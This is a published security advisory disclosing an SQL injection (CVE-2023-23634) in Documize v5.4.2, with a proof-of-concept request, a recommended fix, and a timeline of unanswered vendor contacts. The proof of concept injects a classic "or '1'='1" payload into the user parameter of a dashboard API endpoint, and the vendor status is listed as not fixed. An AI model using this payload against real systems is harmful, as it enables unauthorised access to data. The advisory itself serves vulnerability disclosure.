usd-2022-0066 | Documize v5.4.2 (221021105923) - SQL Injection

Advisory ID: usd-2022-0066
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: SQL Injection (CWE-89)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23634

Description

The user parameter of the /api/dashboard/activity allows SQL-Injection.

Proof of Concept

The following request was used to inject data into the SQL query using the user parameter.

GET /api/dashboard/activity?days=1&user=invalid'%20or%20'1'%3d'1&activity=0 HTTP/1.1
Host: localhost:5001
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]

Fix

It is recommended to use prepared statements.

References

https://owasp.org/www-community/attacks/SQL_Injection

Timeline

2022-12-16: First contact request via mail
2023-01-09: Second contact request via mail
2023-01-16: Try to contact vendor again
2023-02-02: Try to contact vendor again
2023-12-22: Publish advisory

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.

usd-2022-0066 | Documize v5.4.2 (221021105923) - SQL Injection

Description

Proof of Concept

Fix

References

Timeline

Credits

About usd Security Advisories

Disclaimer

usd HeroLab

Contact

Follow Us

LabNews

Security Advisories for SONIX and SAP

The Surprising Complexity of Finding Known Vulnerabilities

Security Advisories for Zimperium and FileCloud